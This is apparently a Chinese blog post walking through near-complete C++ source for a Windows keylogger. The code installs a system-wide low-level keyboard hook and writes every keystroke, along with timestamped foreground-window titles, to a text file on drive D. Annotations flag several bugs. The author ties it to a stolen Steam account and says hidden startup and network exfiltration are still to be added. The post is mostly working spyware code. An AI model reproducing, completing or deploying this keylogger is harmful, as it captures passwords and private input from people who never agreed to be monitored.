这里没有截好屏

代码实现

设置键盘钩子

// Installs the low-level keyboard hook and then pumps messages until WM_QUIT.
//
// The hook is WH_KEYBOARD_LL with thread id 0, i.e. it receives keyboard
// events for every thread on the desktop, and it is owned by this process
// (GetModuleHandle(NULL)).  From a defender's point of view this call is the
// observable registration point: a process holding a system-wide
// WH_KEYBOARD_LL hook.
//
// Returns FALSE immediately if SetWindowsHookEx fails; otherwise it blocks in
// the message loop (the loop is what keeps the hook delivering events) and
// returns TRUE only after GetMessage reports WM_QUIT or an error.
BOOL HookKeyBoard()
{
    kKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,      // low-level keyboard input events
                                     HookProcedure,       // callback
                                     GetModuleHandle(NULL),
                                     NULL);               // thread id 0 = all threads
    if (!kKeyboardHook)
    {
        std::cout << "SetWindowsHookEx()获取句柄失败" << std::endl;
        return FALSE;
    }

    std::cout << "cheer!准备就绪!" << std::endl;
    MSG message{};
    for (;;)
    {
        // GetMessage returns 0 on WM_QUIT and -1 on error; both end the loop.
        const BOOL got = GetMessage(&message, NULL, 0, 0);
        if (got <= 0)
        {
            break;
        }
        TranslateMessage(&message);
        DispatchMessage(&message);
    }
    return TRUE;
}

钩子回调

// WH_KEYBOARD_LL callback, invoked for every keyboard event on the desktop once
// HookKeyBoard() has installed the hook.  Each call appends the decoded key
// (and, whenever the foreground window changed, a timestamped header with the
// window title) to the plain-text log at fileName, and echoes the same text to
// stdout.
//
// Defender's notes: the log is opened in append mode and closed again on every
// callback, so each key event produces one open/write/close on the same path —
// a very regular file-activity pattern — and the content is unencrypted text.
//
// nCode:  hook code; only HC_ACTION is processed.
// wParam: keyboard message id (WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, WM_SYSKEYUP).
// lParam: pointer to the KBDLLHOOKSTRUCT describing the key.
// Returns the result of CallNextHookEx so the event continues down the chain.
LRESULT CALLBACK HookProcedure(int nCode, WPARAM wParam, LPARAM lParam)
{
    std::ofstream myfile(fileName, std::ios::out | std::ios::app);
    BOOL  caps = FALSE;  // Caps Lock assumed off until GetKeyState says otherwise
    SHORT capsShort = GetKeyState(VK_CAPITAL);
    std::string outPut;        // header text is appended here but never written anywhere
    std::stringstream ssTemp;  // scratch stream used to build the output text
    if (capsShort > 0)
    {
        // Author's reading of GetKeyState: a positive value means Caps Lock is on.
        caps = TRUE;
    }
    /* WH_KEYBOARD_LL uses the LowLevelKeyboardProc callback */
    // For low-level keyboard hooks lParam is a KBDLLHOOKSTRUCT; p is only
    // dereferenced below, after nCode == HC_ACTION has been checked.
    KBDLLHOOKSTRUCT *p = (KBDLLHOOKSTRUCT *)lParam;
    // wParam and lParam carry the details of the keyboard message.
    if (nCode == HC_ACTION)
    {
        // Message data is ready for pickup.
        // Track the SHIFT state from left/right shift key events.
        if (p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT)
        {
            // wParam is WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.
            if (wParam == WM_KEYDOWN)
            {
                bShift = TRUE;
            }
            // NOTE(review): the else below belongs to the WM_KEYUP test, so it
            // also executes for WM_KEYDOWN, right after the assignment above.
            if (wParam == WM_KEYUP)
            {
                bShift = FALSE;
            }
            else
            {
                bShift = FALSE;
            }
        }
        // Only key-down events (plain and Alt/system) are logged.
        if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
        {
            // Retrieves a handle to the foreground window (the window with which the user is currently working).
            HWND currentWindow = GetForegroundWindow();  // window that currently has focus
            // Write a new header only when focus moved to a different window.
            if (currentWindow != lastWindow)
            {
                SYSTEMTIME t{};
                GetLocalTime(&t);  // local (not UTC) time for the header
                int day = t.wDay;
                int month = t.wMonth;
                int year = t.wYear;
                int hour = t.wHour;
                int min = t.wMinute;
                int sec = t.wSecond;
                int dayName = t.wDayOfWeek;
                // Build the header: "<weekday> - d/m/yyyy  h:m:s"
                ssTemp << "\n\n " << Dayofweek(dayName) << " - " << day << "/" << month << "/" << year << "  ";
                ssTemp << hour << ":" << min << ":" << sec;
                outPut.append(ssTemp.str());
                ssTemp.clear();  // resets the stream's state flags only; the buffered text is kept
                // GetWindowTextA copies the foreground window title into cWindow
                // (presumably a char array declared elsewhere in this file, given
                // the sizeof); c is the number of characters copied.
                int c = GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
                std::cout << c;
                ssTemp << " Current Window: " << cWindow << "\n\n";
                //outPut.append(temp.str());
                std::cout << ssTemp.str() << std::endl;
                myfile << ssTemp.str();
                // Remember the window so the next callback can detect a change.
                lastWindow = currentWindow;
            }
            // Translate the virtual-key code to its log label and write it.
            if (p->vkCode)
            {
                ssTemp.clear();  // state flags only, as above
                ssTemp << HookCode(p->vkCode, caps, bShift);
                std::cout << ssTemp.str();
                myfile << ssTemp.str();
            }
            // Final output logic
        }
    }
    // A hook procedure must *always* pass the message on.
    myfile.close();
    return 
CallNextHookEx(NULL, nCode, wParam, lParam);  // hook chain
}

获取时间

// Returns the bracketed weekday label used in the log header.
//
// code: weekday index as produced by SYSTEMTIME::wDayOfWeek (0 = Sunday,
//       6 = Saturday), which is what the hook callback passes in.
// Returns "[SUNDAY]" .. "[SATURDAY]" for 0..6 and "[UNKOWN]" for anything
// else (negative values included).  Labels are reproduced exactly as the
// original writes them, spelling included, since they are what appears in
// logs produced by this sample.
std::string Dayofweek(int code)
{
    static const char* const kDayLabels[] = {
        "[SUNDAY]",
        "[MONDAY]",
        "[TUESDAY]",
        "[WENSDAY]",
        "[THURSDAY]",
        "[FRIDAY]",
        "[SATURDAY]",
    };
    const bool inRange = (code >= 0 && code <= 6);
    if (!inRange)
    {
        return "[UNKOWN]";
    }
    return kDayLabels[code];
}

转换符号,真费劲

这就是IDA里面那一长串case内容

// Maps a Windows virtual-key code to the text that is written to the log.
//
// code:  KBDLLHOOKSTRUCT::vkCode of the key that went down.
// caps:  Caps Lock state sampled by the caller (TRUE = on).
// shift: SHIFT state as tracked by the caller.
// Returns the printable character, or a bracketed label such as "[ENTER]"
// for non-printing keys; any code not listed yields "[UNK-KEY]".
//
// Notes for anyone interpreting a log produced by this sample:
//  - letters are upper-case when exactly one of caps/shift is set;
//  - the top-row digit cases are offset by one from the VK code (0x30,
//    the '0' key, is written as "1" / "!", and 0x39 as "0" / ")");
//  - VK_F21..VK_F24 are labelled [F22]..[F25];
//  - the "Action Keys" cases have no break, so VK_PLAY, VK_ZOOM,
//    VK_OEM_CLEAR and VK_CANCEL all fall through to the default "[UNK-KEY]".
std::string HookCode(DWORD code, BOOL caps, BOOL shift)
{
    std::string key;
    switch (code) // switch on the integer VK code
    {
    // Character keys (ASCII letters); no VK_ name exists for these in the header.
    case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break;
    case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break;
    case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break;
    case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break;
    case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break;
    case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break;
    case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break;
    case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break;
    case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break;
    case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break;
    case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break;
    case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break;
    case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break;
    case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break;
    case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break;
    case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break;
    case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break;
    case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break;
    case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break;
    case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;
    case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;
    case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;
    case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;
    case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;
    case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;
    case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;
    // Sleep key
    case VK_SLEEP: key = "[SLEEP]"; break;
    // Numeric keypad
    case VK_NUMPAD0:  key = "0"; break;
    case VK_NUMPAD1:  key = "1"; break;
    case VK_NUMPAD2:  key = "2"; break;
    case VK_NUMPAD3:  key = "3"; break;
    case VK_NUMPAD4:  key = "4"; break;
    case VK_NUMPAD5:  key = "5"; break;
    case VK_NUMPAD6:  key = "6"; break;
    case VK_NUMPAD7:  key = "7"; break;
    case VK_NUMPAD8:  key = "8"; break;
    case VK_NUMPAD9:  key = "9"; break;
    case VK_MULTIPLY: key = "*"; break;
    case VK_ADD:      key = "+"; break;
    case VK_SEPARATOR: key = "-"; break;
    case VK_SUBTRACT: key = "-"; break;
    case VK_DECIMAL:  key = "."; break;
    case VK_DIVIDE:   key = "/"; break;
    // Function keys
    case VK_F1:  key = "[F1]"; break;
    case VK_F2:  key = "[F2]"; break;
    case VK_F3:  key = "[F3]"; break;
    case VK_F4:  key = "[F4]"; break;
    case VK_F5:  key = "[F5]"; break;
    case VK_F6:  key = "[F6]"; break;
    case VK_F7:  key = "[F7]"; break;
    case VK_F8:  key = "[F8]"; break;
    case VK_F9:  key = "[F9]"; break;
    case VK_F10: key = "[F10]"; break;
    case VK_F11: key = "[F11]"; break;
    case VK_F12: key = "[F12]"; break;
    case VK_F13: key = "[F13]"; break;
    case VK_F14: key = "[F14]"; break;
    case VK_F15: key = "[F15]"; break;
    case VK_F16: key = "[F16]"; break;
    case VK_F17: key = "[F17]"; break;
    case VK_F18: key = "[F18]"; break;
    case VK_F19: key = "[F19]"; break;
    case VK_F20: key = "[F20]"; break;
    // Labels below are shifted by one relative to the key (see header comment).
    case VK_F21: key = "[F22]"; break;
    case VK_F22: key = "[F23]"; break;
    case VK_F23: key = "[F24]"; break;
    case VK_F24: key = "[F25]"; break;
    // Control / navigation keys
    case VK_NUMLOCK: key = "[NUM-LOCK]"; break;
    case VK_SCROLL:  key = "[SCROLL-LOCK]"; break;
    case VK_BACK:    key = "[BACK]"; break;
    case VK_TAB:     key = "[TAB]"; break;
    case VK_CLEAR:   key = "[CLEAR]"; break;
    case VK_RETURN:  key = "[ENTER]"; break;
    case VK_SHIFT:   key = "[SHIFT]"; break;
    case VK_CONTROL: key = "[CTRL]"; break;
    case VK_MENU:    key = "[ALT]"; break;
    case VK_PAUSE:   key = "[PAUSE]"; break;
    case VK_CAPITAL: key = "[CAP-LOCK]"; break;
    case VK_ESCAPE:  key = "[ESC]"; break;
    case VK_SPACE:   key = "[SPACE]"; break;
    case VK_PRIOR:   key = "[PAGEUP]"; break;
    case VK_NEXT:    key = "[PAGEDOWN]"; break;
    case VK_END:     key = "[END]"; break;
    case VK_HOME:    key = "[HOME]"; break;
    case VK_LEFT:    key = "[LEFT]"; break;
    case VK_UP:      key = "[UP]"; break;
    case VK_RIGHT:   key = "[RIGHT]"; break;
    case VK_DOWN:    key = "[DOWN]"; break;
    case VK_SELECT:  key = "[SELECT]"; break;
    case VK_PRINT:   key = "[PRINT]"; break;
    case VK_SNAPSHOT: key = "[PRTSCRN]"; break;
    case VK_INSERT:  key = "[INS]"; break;
    case VK_DELETE:  key = "[DEL]"; break;
    case VK_HELP:    key = "[HELP]"; break;
    // Top-row digit keys with their shifted symbols.
    // VK 0x30..0x39 are the '0'..'9' keys; the labels here start at "1".
    case 0x30: key = shift ? "!" : "1"; break;
    case 0x31: key = shift ? "@" : "2"; break;
    case 0x32: key = shift ? "#" : "3"; break;
    case 0x33: key = shift ? "$" : "4"; break;
    case 0x34: key = shift ? "%" : "5"; break;
    case 0x35: key = shift ? "^" : "6"; break;
    case 0x36: key = shift ? "&" : "7"; break;
    case 0x37: key = shift ? "*" : "8"; break;
    case 0x38: key = shift ? "(" : "9"; break;
    case 0x39: key = shift ? ")" : "0"; break;
    // Windows / modifier keys (left and right variants share a label)
    case VK_LWIN:     key = "[WIN]"; break;
    case VK_RWIN:     key = "[WIN]"; break;
    case VK_LSHIFT:   key = "[SHIFT]"; break;
    case VK_RSHIFT:   key = "[SHIFT]"; break;
    case VK_LCONTROL: key = "[CTRL]"; break;
    case VK_RCONTROL: key = "[CTRL]"; break;
    // OEM punctuation keys with their shifted symbols (US layout assumed by the author)
    case VK_OEM_1:      key = shift ? ":" : ";"; break;
    case VK_OEM_PLUS:   key = shift ? "+" : "="; break;
    case VK_OEM_COMMA:  key = shift ? "<" : ","; break;
    case VK_OEM_MINUS:  key = shift ? "_" : "-"; break;
    case VK_OEM_PERIOD: key = shift ? ">" : "."; break;
    case VK_OEM_2:      key = shift ? "?" : "/"; break;
    case VK_OEM_3:      key = shift ? "~" : "`"; break;
    case VK_OEM_4:      key = shift ? "{" : "["; break;
    case VK_OEM_5:      key = shift ? "\\" : "|"; break;
    case VK_OEM_6:      key = shift ? "}" : "]"; break;
    case VK_OEM_7:      key = shift ? "'" : "'"; break; // TODO: escape this char: "
    // Action keys: no break on any of these, so they all fall through to default.
    case VK_PLAY:       key = "[PLAY]";
    case VK_ZOOM:       key = "[ZOOM]";
    case VK_OEM_CLEAR:  key = "[CLEAR]";
    case VK_CANCEL:     key = "[CTRL-C]";
    default: key = "[UNK-KEY]"; break;
    }
    return key;
}

释放键盘钩子

// Removes the keyboard hook, if one was installed, and terminates the process.
//
// kKeyboardHook is the handle stored by HookKeyBoard(); a zero handle means
// the hook was never installed, in which case only the exit happens.  This
// function never returns: exit(0) ends the process unconditionally.
void unhookKeyboard()
{
    const bool hookInstalled = (kKeyboardHook != 0);
    if (hookInstalled)
    {
        UnhookWindowsHookEx(kKeyboardHook);
    }
    exit(0);
}

main

int main()
{std::cout << "start !" << std::endl;//  设置键盘钩子if (!HookKeyBoard()){std::cout << "Hook KeyBoard Failed!" << std::endl;}unhookKeyboard();//释放hook
}

康康效果

在D盘创建一个txt文件记录


上个学期在网吧玩steam被盗号了,当时觉得可能是获取cookie,现在想想这个方法不成熟,不能持久登录,应该就是这种键盘钩子
今天实现了一部分功能,如果要达到网吧的效果,需要加上隐蔽启动和网络连接,先发现其他样本,学到14章以后再加上网络功能
